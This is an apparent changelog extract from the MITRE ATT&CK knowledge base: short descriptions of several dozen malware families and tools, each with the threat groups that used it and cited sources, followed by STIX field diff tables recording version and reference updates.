| [AADInternals](https://attack.mitre.org/software/S0677) is a PowerShell-based framework for administering, enumerating, and exploiting Azure Active Directory. The tool is publicly available on GitHub.(Citation: AADInternals Github)(Citation: AADInternals Documentation) |
| Description |
|---|
| [Action RAT](https://attack.mitre.org/software/S1028) is a remote access tool written in Delphi that has been used by [SideCopy](https://attack.mitre.org/groups/G1008) since at least December 2021 against Indian and Afghani government personnel.(Citation: MalwareBytes SideCopy Dec 2021) |
| Description |
|---|
| [Amadey](https://attack.mitre.org/software/S1025) is a Trojan bot that has been used since at least October 2018.(Citation: Korean FSI TA505 2020)(Citation: BlackBerry Amadey 2020) |
| Description |
|---|
| [AuTo Stealer](https://attack.mitre.org/software/S1029) is malware written in C++ that has been used by [SideCopy](https://attack.mitre.org/groups/G1008) since at least December 2021 to target government agencies and personnel in India and Afghanistan.(Citation: MalwareBytes SideCopy Dec 2021) |
| Description |
|---|
| [Bumblebee](https://attack.mitre.org/software/S1039) is a custom loader written in C++ that has been used by multiple threat actors, including possible initial access brokers, to download and execute additional payloads since at least March 2022. [Bumblebee](https://attack.mitre.org/software/S1039) has been linked to ransomware operations including [Conti](https://attack.mitre.org/software/S0575), Quantum, and Mountlocker and derived its name from the appearance of "bumblebee" in the user-agent.(Citation: Google EXOTIC LILY March 2022)(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022) |
| Description |
|---|
| [CaddyWiper](https://attack.mitre.org/software/S0693) is a destructive data wiper that has been used in attacks against organizations in Ukraine since at least March 2022.(Citation: ESET CaddyWiper March 2022)(Citation: Cisco CaddyWiper March 2022) |
| Description |
|---|
| [CharmPower](https://attack.mitre.org/software/S0674) is a PowerShell-based, modular backdoor that has been used by [Magic Hound](https://attack.mitre.org/groups/G0059) since at least 2022.(Citation: Check Point APT35 CharmPower January 2022) |
| Description |
|---|
| [Chinoxy](https://attack.mitre.org/software/S1041) is a backdoor that has been used since at least November 2018, during the [FunnyDream](https://attack.mitre.org/campaigns/C0007) campaign, to gain persistence and drop additional payloads. According to security researchers, [Chinoxy](https://attack.mitre.org/software/S1041) has been used by Chinese-speaking threat actors.(Citation: Bitdefender FunnyDream Campaign November 2020) |
| Description |
|---|
| [Chrommme](https://attack.mitre.org/software/S0667) is a backdoor tool written using the Microsoft Foundation Class (MFC) framework that was first reported in June 2021; security researchers noted infrastructure overlaps with [Gelsemium](https://attack.mitre.org/software/S0666) malware.(Citation: ESET Gelsemium June 2021) |
| Description |
|---|
| [Clambling](https://attack.mitre.org/software/S0660) is a modular backdoor written in C++ that has been used by [Threat Group-3390](https://attack.mitre.org/groups/G0027) since at least 2017.(Citation: Trend Micro DRBControl February 2020) |
| Description |
|---|
| [CreepyDrive](https://attack.mitre.org/software/S1023) is a custom implant that has been used by [POLONIUM](https://attack.mitre.org/groups/G1005) since at least early 2022 for C2 with, and exfiltration to, actor-controlled OneDrive accounts.(Citation: Microsoft POLONIUM June 2022) [POLONIUM](https://attack.mitre.org/groups/G1005) has used a similar implant called CreepyBox that relies on actor-controlled DropBox accounts.(Citation: Microsoft POLONIUM June 2022) |
| Description |
|---|
| [CreepySnail](https://attack.mitre.org/software/S1024) is a custom PowerShell implant that has been used by [POLONIUM](https://attack.mitre.org/groups/G1005) since at least 2022.(Citation: Microsoft POLONIUM June 2022) |
| Description |
|---|
| [Cyclops Blink](https://attack.mitre.org/software/S0687) is a modular malware that has been used in widespread campaigns by [Sandworm Team](https://attack.mitre.org/groups/G0034) since at least 2019 to target Small/Home Office (SOHO) network devices, including WatchGuard and Asus.(Citation: NCSC Cyclops Blink February 2022)(Citation: NCSC CISA Cyclops Blink Advisory February 2022)(Citation: Trend Micro Cyclops Blink March 2022) |
| Description |
|---|
| [DCSrv](https://attack.mitre.org/software/S1033) is destructive malware that has been used by [Moses Staff](https://attack.mitre.org/groups/G1009) since at least September 2021. Though [DCSrv](https://attack.mitre.org/software/S1033) has ransomware-like capabilities, [Moses Staff](https://attack.mitre.org/groups/G1009) does not demand ransom or offer a decryption key.(Citation: Checkpoint MosesStaff Nov 2021) |
| Description |
|---|
| [DRATzarus](https://attack.mitre.org/software/S0694) is a remote access tool (RAT) that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) to target defense and aerospace organizations globally since at least summer 2020. [DRATzarus](https://attack.mitre.org/software/S0694) shares similarities with [Bankshot](https://attack.mitre.org/software/S0239), which was used by [Lazarus Group](https://attack.mitre.org/groups/G0032) in 2017 to target the Turkish financial sector.(Citation: ClearSky Lazarus Aug 2020) |
| Description |
|---|
| [DanBot](https://attack.mitre.org/software/S1014) is a first-stage remote access Trojan written in C# that has been used by [HEXANE](https://attack.mitre.org/groups/G1001) since at least 2018.(Citation: SecureWorks August 2019) |
| Description |
|---|
| [DarkWatchman](https://attack.mitre.org/software/S0673) is a lightweight JavaScript-based remote access tool (RAT) that avoids file operations; it was first observed in November 2021.(Citation: Prevailion DarkWatchman 2021) |
| Description |
|---|
| [Diavol](https://attack.mitre.org/software/S0659) is a ransomware variant first observed in June 2021 that is capable of prioritizing file types to encrypt based on a pre-configured list of extensions defined by the attacker. [Diavol](https://attack.mitre.org/software/S0659) has been deployed by [Bazar](https://attack.mitre.org/software/S0534) and is thought to have potential ties to [Wizard Spider](https://attack.mitre.org/groups/G0102).(Citation: Fortinet Diavol July 2021)(Citation: FBI Flash Diavol January 2022)(Citation: DFIR Diavol Ransomware December 2021) |
| Description |
|---|
| [DnsSystem](https://attack.mitre.org/software/S1021) is a .NET based DNS backdoor, which is a customized version of the open source tool DIG.net, that has been used by [HEXANE](https://attack.mitre.org/groups/G1001) since at least June 2022.(Citation: Zscaler Lyceum DnsSystem June 2022) |
| Description |
|---|
| [Donut](https://attack.mitre.org/software/S0695) is an open source framework used to generate position-independent shellcode.(Citation: Donut Github)(Citation: Introducing Donut) [Donut](https://attack.mitre.org/software/S0695) generated code has been used by multiple threat actors to inject and load malicious payloads into memory.(Citation: NCC Group WastedLocker June 2020) |
| Description |
|---|
| [Ferocious](https://attack.mitre.org/software/S0679) is a first stage implant composed of VBS and PowerShell scripts that has been used by [WIRTE](https://attack.mitre.org/groups/G0090) since at least 2021.(Citation: Kaspersky WIRTE November 2021) |
| Description |
|---|
| [Flagpro](https://attack.mitre.org/software/S0696) is a Windows-based, first-stage downloader that has been used by [BlackTech](https://attack.mitre.org/groups/G0098) since at least October 2020. It has primarily been used against defense, media, and communications companies in Japan.(Citation: NTT Security Flagpro new December 2021) |
| Description |
|---|
| [FoggyWeb](https://attack.mitre.org/software/S0661) is a passive and highly-targeted backdoor capable of remotely exfiltrating sensitive information from a compromised Active Directory Federated Services (AD FS) server. It has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least early April 2021.(Citation: MSTIC FoggyWeb September 2021) |
| Description |
|---|
| [FunnyDream](https://attack.mitre.org/software/S1044) is a backdoor with multiple components that was used during the [FunnyDream](https://attack.mitre.org/campaigns/C0007) campaign since at least 2019, primarily for execution and exfiltration.(Citation: Bitdefender FunnyDream Campaign November 2020) |
| Description |
|---|
| [Gelsemium](https://attack.mitre.org/software/S0666) is a modular malware composed of a dropper (Gelsemine), a loader (Gelsenicine), and main (Gelsevirine) plug-ins written using the Microsoft Foundation Class (MFC) framework. [Gelsemium](https://attack.mitre.org/software/S0666) has been used by the Gelsemium group since at least 2014.(Citation: ESET Gelsemium June 2021) |
| Description |
|---|
| [Green Lambert](https://attack.mitre.org/software/S0690) is a modular backdoor that security researchers assess has been used by an advanced threat group referred to as Longhorn and The Lamberts. First reported in 2017, the Windows variant of [Green Lambert](https://attack.mitre.org/software/S0690) may have been used as early as 2008; a macOS version was uploaded to a multiscanner service in September 2014.(Citation: Kaspersky Lamberts Toolkit April 2017)(Citation: Objective See Green Lambert for OSX Oct 2021) |
| Description |
|---|
| [HermeticWiper](https://attack.mitre.org/software/S0697) is a data wiper that has been used since at least early 2022, primarily against Ukraine with additional activity observed in Latvia and Lithuania. Some sectors targeted include government, financial, defense, aviation, and IT services.(Citation: SentinelOne Hermetic Wiper February 2022)(Citation: Symantec Ukraine Wipers February 2022)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: ESET Hermetic Wiper February 2022)(Citation: Qualys Hermetic Wiper March 2022) |
| Description |
|---|
| [HermeticWizard](https://attack.mitre.org/software/S0698) is a worm that has been used to spread [HermeticWiper](https://attack.mitre.org/software/S0697) in attacks against organizations in Ukraine since at least 2022.(Citation: ESET Hermetic Wizard March 2022) |
| Description |
|---|
| [Heyoka Backdoor](https://attack.mitre.org/software/S1027) is a custom backdoor, based on the Heyoka open source exfiltration tool, that has been used by [Aoqin Dragon](https://attack.mitre.org/groups/G1007) since at least 2013.(Citation: SentinelOne Aoqin Dragon June 2022)(Citation: Sourceforge Heyoka 2022) |
| Description |
|---|
| [IceApple](https://attack.mitre.org/software/S1022) is a modular Internet Information Services (IIS) post-exploitation framework, that has been used since at least 2021 against the technology, academic, and government sectors.(Citation: CrowdStrike IceApple May 2022) |
| Description |
|---|
| [KOCTOPUS](https://attack.mitre.org/software/S0669)'s batch variant is a loader used by [LazyScripter](https://attack.mitre.org/groups/G0140) since 2018 to launch [Octopus](https://attack.mitre.org/software/S0340) and [Koadic](https://attack.mitre.org/software/S0250) and, in some cases, [QuasarRAT](https://attack.mitre.org/software/S0262). [KOCTOPUS](https://attack.mitre.org/software/S0669) also has a VBA variant that has the same functionality as the batch version.(Citation: MalwareBytes LazyScripter Feb 2021) |
| Description |
|---|
| [Kevin](https://attack.mitre.org/software/S1020) is a backdoor implant written in C++ that has been used by [HEXANE](https://attack.mitre.org/groups/G1001) since at least June 2020, including in operations against organizations in Tunisia.(Citation: Kaspersky Lyceum October 2021) |
| Description |
|---|
| [LitePower](https://attack.mitre.org/software/S0680) is a downloader and second stage malware that has been used by [WIRTE](https://attack.mitre.org/groups/G0090) since at least 2021.(Citation: Kaspersky WIRTE November 2021) |
| Description |
|---|
| [Lizar](https://attack.mitre.org/software/S0681) is a modular remote access tool written using the .NET Framework that shares structural similarities to [Carbanak](https://attack.mitre.org/software/S0030). It has likely been used by [FIN7](https://attack.mitre.org/groups/G0046) since at least February 2021.(Citation: BiZone Lizar May 2021)(Citation: Threatpost Lizar May 2021)(Citation: Gemini FIN7 Oct 2021) |
| Description |
|---|
| [MacMa](https://attack.mitre.org/software/S1016) is a macOS-based backdoor with a large set of functionalities to control and exfiltrate files from a compromised computer. [MacMa](https://attack.mitre.org/software/S1016) has been observed in the wild since November 2021.(Citation: ESET DazzleSpy Jan 2022) |
| Description |
|---|
| [Meteor](https://attack.mitre.org/software/S0688) is a wiper that was used against Iranian government organizations, including Iranian Railways, the Ministry of Roads, and Urban Development systems, in July 2021. [Meteor](https://attack.mitre.org/software/S0688) is likely a newer version of similar wipers called Stardust and Comet that were reportedly used by a group called "Indra" since at least 2019 against private companies in Syria.(Citation: Check Point Meteor Aug 2021) |
| Description |
|---|
| [Milan](https://attack.mitre.org/software/S1015) is a backdoor implant based on [DanBot](https://attack.mitre.org/software/S1014) that was written in Visual C++ and .NET. [Milan](https://attack.mitre.org/software/S1015) has been used by [HEXANE](https://attack.mitre.org/groups/G1001) since at least June 2020.(Citation: ClearSky Siamesekitten August 2021)(Citation: Kaspersky Lyceum October 2021) |
| Description |
|---|
| [Mongall](https://attack.mitre.org/software/S1026) is a backdoor that has been used since at least 2013, including by [Aoqin Dragon](https://attack.mitre.org/groups/G1007).(Citation: SentinelOne Aoqin Dragon June 2022) |
| Description |
|---|
| [Mori](https://attack.mitre.org/software/S1047) is a backdoor that has been used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least January 2022.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: CYBERCOM Iranian Intel Cyber January 2022) |
| Description |
|---|
| [Mythic](https://attack.mitre.org/software/S0699) is an open source, cross-platform post-exploitation/command and control platform. [Mythic](https://attack.mitre.org/software/S0699) is designed to "plug-n-play" with various agents and communication channels.(Citation: Mythic Github)(Citation: Mythic SpecterOps)(Citation: Mythc Documentation) Deployed [Mythic](https://attack.mitre.org/software/S0699) C2 servers have been observed as part of potentially malicious infrastructure.(Citation: RecordedFuture 2021 Ad Infra) |
| Description |
|---|
| [Neoichor](https://attack.mitre.org/software/S0691) is C2 malware used by [Ke3chang](https://attack.mitre.org/groups/G0004) since at least 2019; similar malware families used by the group include Leeson and Numbldea.(Citation: Microsoft NICKEL December 2021) |
| Description |
|---|
| [OutSteel](https://attack.mitre.org/software/S1017) is a file uploader and document stealer developed with the scripting language AutoIT that has been used by [Ember Bear](https://attack.mitre.org/groups/G1003) since at least March 2021.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ) |
| Description |
|---|
| [Pandora](https://attack.mitre.org/software/S0664) is a multistage kernel rootkit with backdoor functionality that has been in use by [Threat Group-3390](https://attack.mitre.org/groups/G0027) since at least 2020.(Citation: Trend Micro Iron Tiger April 2021) |
| Description |
|---|
| [PcShare](https://attack.mitre.org/software/S1050) is an open source remote access tool that has been modified and used by Chinese threat actors, most notably during the FunnyDream campaign since late 2018.(Citation: Bitdefender FunnyDream Campaign November 2020)(Citation: GitHub PcShare 2014) |
| Description |
|---|
| [Peirates](https://attack.mitre.org/software/S0683) is a post-exploitation framework for Kubernetes with a focus on gathering service account tokens for lateral movement and privilege escalation. The tool is written in GoLang and publicly available on GitHub.(Citation: Peirates GitHub) |
| Description |
|---|
| [PingPull](https://attack.mitre.org/software/S1031) is a remote access Trojan (RAT) written in Visual C++ that has been used by [GALLIUM](https://attack.mitre.org/groups/G0093) since at least June 2022. [PingPull](https://attack.mitre.org/software/S1031) has been used to target telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam.(Citation: Unit 42 PingPull Jun 2022) |
| Description |
|---|
| [PowGoop](https://attack.mitre.org/software/S1046) is a loader that consists of a DLL loader and a PowerShell-based downloader; it has been used by [MuddyWater](https://attack.mitre.org/groups/G0069) as their main loader.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: CYBERCOM Iranian Intel Cyber January 2022) |
| Description |
|---|
| [PowerLess](https://attack.mitre.org/software/S1012) is a PowerShell-based modular backdoor that has been used by [Magic Hound](https://attack.mitre.org/groups/G0059) since at least 2022.(Citation: Cybereason PowerLess February 2022) |
| Description |
|---|
| [PowerPunch](https://attack.mitre.org/software/S0685) is a lightweight downloader that has been used by [Gamaredon Group](https://attack.mitre.org/groups/G0047) since at least 2021.(Citation: Microsoft Actinium February 2022) |
| Description |
|---|
| [PyDCrypt](https://attack.mitre.org/software/S1032) is malware written in Python designed to deliver [DCSrv](https://attack.mitre.org/software/S1033). It has been used by [Moses Staff](https://attack.mitre.org/groups/G1009) since at least September 2021, with each sample tailored for its intended victim organization.(Citation: Checkpoint MosesStaff Nov 2021) |
| Description |
|---|
| [QuietSieve](https://attack.mitre.org/software/S0686) is an information stealer that has been used by [Gamaredon Group](https://attack.mitre.org/groups/G0047) since at least 2021.(Citation: Microsoft Actinium February 2022) |
| Description |
|---|
| [RCSession](https://attack.mitre.org/software/S0662) is a backdoor written in C++ that has been in use since at least 2018 by [Mustang Panda](https://attack.mitre.org/groups/G0129) and by [Threat Group-3390](https://attack.mitre.org/groups/G0027) (Type II Backdoor).(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Trend Micro Iron Tiger April 2021)(Citation: Trend Micro DRBControl February 2020) |
| Description |
|---|
| [ROADTools](https://attack.mitre.org/software/S0684) is a framework for enumerating Azure Active Directory environments. The tool is written in Python and publicly available on GitHub.(Citation: ROADtools Github) |
| Description |
|---|
| [Rclone](https://attack.mitre.org/software/S1040) is a command line program for syncing files with cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA. [Rclone](https://attack.mitre.org/software/S1040) has been used in a number of ransomware campaigns, including those associated with the [Conti](https://attack.mitre.org/software/S0575) and DarkSide Ransomware-as-a-Service operations.(Citation: Rclone)(Citation: Rclone Wars)(Citation: Detecting Rclone)(Citation: DarkSide Ransomware Gang)(Citation: DFIR Conti Bazar Nov 2021) |
| Description |
|---|
| [SILENTTRINITY](https://attack.mitre.org/software/S0692) is an open source remote administration and post-exploitation framework primarily written in Python that includes stagers written in PowerShell, C, and Boo. [SILENTTRINITY](https://attack.mitre.org/software/S0692) was used in a 2019 campaign against Croatian government agencies by unidentified cyber actors.(Citation: GitHub SILENTTRINITY March 2022)(Citation: Security Affairs SILENTTRINITY July 2019) |
| Description |
|---|
| [STARWHALE](https://attack.mitre.org/software/S1037) is a Windows Script File (WSF) backdoor that has been used by [MuddyWater](https://attack.mitre.org/groups/G0069), possibly since at least November 2021; there is also a [STARWHALE](https://attack.mitre.org/software/S1037) variant written in Golang with similar capabilities. Security researchers have also noted the use of [STARWHALE](https://attack.mitre.org/software/S1037) by UNC3313, which may be associated with [MuddyWater](https://attack.mitre.org/groups/G0069).(Citation: Mandiant UNC3313 Feb 2022)(Citation: DHS CISA AA22-055A MuddyWater February 2022) |
| Description |
|---|
| [SUGARDUMP](https://attack.mitre.org/software/S1042) is a proprietary browser credential harvesting tool that was used by UNC3890 during the [C0010](https://attack.mitre.org/campaigns/C0010) campaign. The first known [SUGARDUMP](https://attack.mitre.org/software/S1042) version was used since at least early 2021, a second SMTP C2 version was used from late 2021-early 2022, and a third HTTP C2 variant was used since at least April 2022.(Citation: Mandiant UNC3890 Aug 2022) |
| Description |
|---|
| [SUGARUSH](https://attack.mitre.org/software/S1049) is a small custom backdoor that can establish a reverse shell over TCP to a hard-coded C2 address. [SUGARUSH](https://attack.mitre.org/software/S1049) was first identified during analysis of UNC3890's [C0010](https://attack.mitre.org/campaigns/C0010) campaign targeting Israeli companies, which began in late 2020.(Citation: Mandiant UNC3890 Aug 2022) |
| Description |
|---|
| [Saint Bot](https://attack.mitre.org/software/S1018) is a .NET downloader that has been used by [Ember Bear](https://attack.mitre.org/groups/G1003) since at least March 2021.(Citation: Malwarebytes Saint Bot April 2021)(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ) |
| Description |
|---|
| [Shark](https://attack.mitre.org/software/S1019) is a backdoor malware written in C# and .NET that is an updated version of [Milan](https://attack.mitre.org/software/S1015); it has been used by [HEXANE](https://attack.mitre.org/groups/G1001) since at least July 2021.(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021) |
| Description |
|---|
| [Small Sieve](https://attack.mitre.org/software/S1035) is a Telegram Bot API-based Python backdoor that has been distributed using a Nullsoft Scriptable Install System (NSIS) Installer; it has been used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least January 2022.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: NCSC GCHQ Small Sieve Jan 2022) Security researchers have also noted [Small Sieve](https://attack.mitre.org/software/S1035)'s use by UNC3313, which may be associated with [MuddyWater](https://attack.mitre.org/groups/G0069).(Citation: Mandiant UNC3313 Feb 2022) |
| Description |
|---|
| [Squirrelwaffle](https://attack.mitre.org/software/S1030) is a loader that was first seen in September 2021. It has been used in spam email campaigns to deliver additional malware such as [Cobalt Strike](https://attack.mitre.org/software/S0154) and the [QakBot](https://attack.mitre.org/software/S0650) banking trojan.(Citation: ZScaler Squirrelwaffle Sep 2021)(Citation: Netskope Squirrelwaffle Oct 2021) |
| Description |
|---|
| [StrifeWater](https://attack.mitre.org/software/S1034) is a remote-access tool that has been used by [Moses Staff](https://attack.mitre.org/groups/G1009) in the initial stages of their attacks since at least November 2021.(Citation: Cybereason StrifeWater Feb 2022) |
| Description |
|---|
| [SysUpdate](https://attack.mitre.org/software/S0663) is a backdoor written in C++ that has been used by [Threat Group-3390](https://attack.mitre.org/groups/G0027) since at least 2020.(Citation: Trend Micro Iron Tiger April 2021) |
| Description |
|---|
| [Tarrask](https://attack.mitre.org/software/S1011) is malware that has been used by [HAFNIUM](https://attack.mitre.org/groups/G0125) since at least August 2021. [Tarrask](https://attack.mitre.org/software/S1011) was designed to evade digital defenses and maintain persistence by generating concealed scheduled tasks.(Citation: Tarrask scheduled task) |
| Description |
|---|
| [ThreatNeedle](https://attack.mitre.org/software/S0665) is a backdoor that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) since at least 2019 to target cryptocurrency, defense, and mobile gaming organizations. It is considered to be an advanced cluster of [Lazarus Group](https://attack.mitre.org/groups/G0032)'s Manuscrypt (a.k.a. NukeSped) malware family.(Citation: Kaspersky ThreatNeedle Feb 2021) |
| Description |
|---|
| [TinyTurla](https://attack.mitre.org/software/S0668) is a backdoor that has been used by [Turla](https://attack.mitre.org/groups/G0010) against targets in the US, Germany, and Afghanistan since at least 2020.(Citation: Talos TinyTurla September 2021) |
| Description |
|---|
| [Tomiris](https://attack.mitre.org/software/S0671) is a backdoor written in Go that continuously queries its C2 server for executables to download and execute on a victim system. It was first reported in September 2021 during an investigation of a successful DNS hijacking campaign against a Commonwealth of Independent States (CIS) member. Security researchers assess there are similarities between [Tomiris](https://attack.mitre.org/software/S0671) and [GoldMax](https://attack.mitre.org/software/S0588).(Citation: Kaspersky Tomiris Sep 2021) |
| Description |
|---|
| [Torisma](https://attack.mitre.org/software/S0678) is a second stage implant designed for specialized monitoring that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032). [Torisma](https://attack.mitre.org/software/S0678) was discovered during an investigation into the 2020 Operation North Star campaign that targeted the defense sector.(Citation: McAfee Lazarus Nov 2020) |
| Description |
|---|
| [TrailBlazer](https://attack.mitre.org/software/S0682) is a modular malware that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2019.(Citation: CrowdStrike StellarParticle January 2022) |
| Description |
|---|
| [WarzoneRAT](https://attack.mitre.org/software/S0670) is a malware-as-a-service remote access tool (RAT) written in C++ that has been publicly available for purchase since at least late 2018.(Citation: Check Point Warzone Feb 2020)(Citation: Uptycs Warzone UAC Bypass November 2020) |
| Description |
|---|
| [WhisperGate](https://attack.mitre.org/software/S0689) is a multi-stage wiper designed to look like ransomware that has been used in attacks against Ukraine since at least January 2022.(Citation: Cybereason WhisperGate February 2022)(Citation: Unit 42 WhisperGate January 2022)(Citation: Microsoft WhisperGate January 2022) |
| Description |
|---|
| [Zox](https://attack.mitre.org/software/S0672) is a remote access tool that has been used by [Axiom](https://attack.mitre.org/groups/G0001) since at least 2008.(Citation: Novetta-Axiom) |
| Description |
|---|
| [ZxxZ](https://attack.mitre.org/software/S1013) is a trojan written in Visual C++ that has been used by [BITTER](https://attack.mitre.org/groups/G1002) since at least August 2021, including against Bangladeshi government personnel.(Citation: Cisco Talos Bitter Bangladesh May 2022) |
| Description |
|---|
| [ccf32](https://attack.mitre.org/software/S1043) is data collection malware that has been used since at least February 2019, most notably during the [FunnyDream](https://attack.mitre.org/campaigns/C0007) campaign; there is also a similar x64 version.(Citation: Bitdefender FunnyDream Campaign November 2020) |
| Description |
|---|
| [macOS.OSAMiner](https://attack.mitre.org/software/S1048) is a Monero mining trojan that was first observed in 2018; security researchers assessed [macOS.OSAMiner](https://attack.mitre.org/software/S1048) may have been circulating since at least 2015. [macOS.OSAMiner](https://attack.mitre.org/software/S1048) is known for embedding one run-only AppleScript into another, which helped the malware evade full analysis for five years due to a lack of Apple event (AEVT) analysis tools.(Citation: SentinelLabs reversing run-only applescripts 2021)(Citation: VMRay OSAMiner dynamic analysis 2021) |
| Description |
|---|
| [ASPXSpy](https://attack.mitre.org/software/S0073) is a Web shell. It has been modified by [Threat Group-3390](https://attack.mitre.org/groups/G0027) actors to create the ASPXTool version. (Citation: Dell TG-3390) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 14:48:21.994000+00:00 | 2022-09-22 20:56:06.265000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
| Description |
|---|
| [AdFind](https://attack.mitre.org/software/S0552) is a free command-line query tool that can be used for gathering information from Active Directory.(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye FIN6 Apr 2019)(Citation: FireEye Ryuk and Trickbot January 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-12-29 18:04:33.254000+00:00 | 2022-09-29 20:40:24.739000+00:00 |
| external_references[1]['url'] | https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/ | https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/ |
| external_references[2]['source_name'] | FireEye FIN6 Apr 2019 | FireEye Ryuk and Trickbot January 2019 |
| external_references[2]['description'] | McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019. | Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020. |
| external_references[2]['url'] | https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html | https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html |
| external_references[3]['source_name'] | FireEye Ryuk and Trickbot January 2019 | FireEye FIN6 Apr 2019 |
| external_references[3]['description'] | Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020. | McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019. |
| external_references[3]['url'] | https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html | https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [Anchor](https://attack.mitre.org/software/S0504) is one of a family of backdoor malware that has been used in conjunction with [TrickBot](https://attack.mitre.org/software/S0266) on selected high profile targets since at least 2018.(Citation: Cyberreason Anchor December 2019)(Citation: Medium Anchor DNS July 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-05 17:54:53.991000+00:00 | 2021-12-15 20:56:24.628000+00:00 |
| Description |
|---|
| [AppleJeus](https://attack.mitre.org/software/S0584) is a family of downloaders initially discovered in 2018 embedded within trojanized cryptocurrency applications. [AppleJeus](https://attack.mitre.org/software/S0584) has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032), targeting companies in the energy, finance, government, industry, technology, and telecommunications sectors, and several countries including the United States, United Kingdom, South Korea, Australia, Brazil, New Zealand, and Russia. [AppleJeus](https://attack.mitre.org/software/S0584) has been used to distribute the [FALLCHILL](https://attack.mitre.org/software/S0181) RAT.(Citation: CISA AppleJeus Feb 2021) |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-27 20:49:10.831000+00:00 | 2022-09-28 17:46:18.677000+00:00 |
| x_mitre_version | 1.0 | 1.1 |

| Description |
|---|
| [AppleSeed](https://attack.mitre.org/software/S0622) is a backdoor that has been used by [Kimsuky](https://attack.mitre.org/groups/G0094) to target South Korean government, academic, and commercial targets since at least 2021.(Citation: Malwarebytes Kimsuky June 2021) |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 23:17:58.410000+00:00 | 2022-03-15 20:08:18.786000+00:00 |
| x_mitre_version | 1.0 | 1.1 |

| Old Description | New Description |
|---|---|
| [Arp](https://attack.mitre.org/software/S0099) displays information about a system's Address Resolution Protocol (ARP) cache. (Citation: TechNet Arp) | [Arp](https://attack.mitre.org/software/S0099) displays and modifies information about a system's Address Resolution Protocol (ARP) cache. (Citation: TechNet Arp) |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2021-12-07 18:27:04.603000+00:00 |
| description | [Arp](https://attack.mitre.org/software/S0099) displays information about a system's Address Resolution Protocol (ARP) cache. (Citation: TechNet Arp) | [Arp](https://attack.mitre.org/software/S0099) displays and modifies information about a system's Address Resolution Protocol (ARP) cache. (Citation: TechNet Arp) |
| x_mitre_version | 1.0 | 1.1 |

| Description |
|---|
